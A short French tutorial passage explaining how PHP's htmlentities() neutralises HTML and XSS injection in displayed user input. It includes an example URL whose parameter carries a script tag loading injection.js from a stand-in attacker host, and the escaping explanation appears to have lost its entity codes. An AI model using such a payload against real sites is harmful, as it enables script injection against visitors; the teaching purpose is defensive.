Protection contre les injections HTML XCSS
La fonction htmlentities() permet de protéger l'affichage de données dont on n'est pas sûr de l'origine en rendant toutes les balises XHTML inopérentes. Exemple: http://www.monsite.com?monpseudo=<strong>Justine</strong><script src="http://hacker.com/injection.js" > <?php echo "Salut ".htmlentities($_GET['monpseudo']); ?> En gros, cette fonction va remplacer < par < ou > par > à l'affichage, rendant caduque toute tentative malveillante d'injection HTML (ou […]